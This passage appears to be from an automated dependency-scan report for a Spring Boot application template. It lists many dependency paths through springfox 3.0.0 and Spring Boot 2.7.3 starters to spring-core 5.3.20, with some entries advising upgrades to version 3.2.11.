  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-aop@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-cache@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-cache@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-mail@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-mail@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-security@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-security@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-thymeleaf@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-thymeleaf@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot-autoconfigure@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-actuator@2.7.3 org.springframework.boot:spring-boot-actuator-autoconfigure@2.7.3 org.springframework.boot:spring-boot-actuator@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-actuator@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-aop@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-data-jpa@2.7.3 org.springframework.boot:spring-boot-starter-jdbc@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-data-jpa@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b org.springframework.boot:spring-boot-starter-web@2.7.3 org.springframework.boot:spring-boot-starter-json@2.7.3 org.springframework.boot:spring-boot-starter@2.7.3 org.springframework.boot:spring-boot@2.7.3 org.springframework:spring-context@5.3.20 org.springframework:spring-expression@5.3.22 org.springframework:spring-core@5.3.20
    Remediation: Upgrade to org.springframework.boot:spring-boot-starter-web@3.2.11.
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-web@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 org.springframework.plugin:spring-plugin-metadata@2.0.0.RELEASE org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-spi@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-swagger-common@3.0.0 io.springfox:springfox-schema@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger-ui@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webmvc@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
  • Introduced through: Spring-Boot-Framework/Spring-Boot-Application-Template@Spring-Boot-Framework/Spring-Boot-Application-Template#097a10e649ff2dabd5e88aeea3938f2b4bff0c8b io.springfox:springfox-swagger2@3.0.0 io.springfox:springfox-spring-webflux@3.0.0 io.springfox:springfox-spring-web@3.0.0 io.springfox:springfox-core@3.0.0 org.springframework.plugin:spring-plugin-core@2.0.0.RELEASE org.springframework:spring-context@5.3.20 org.springframework:spring-core@5.3.20
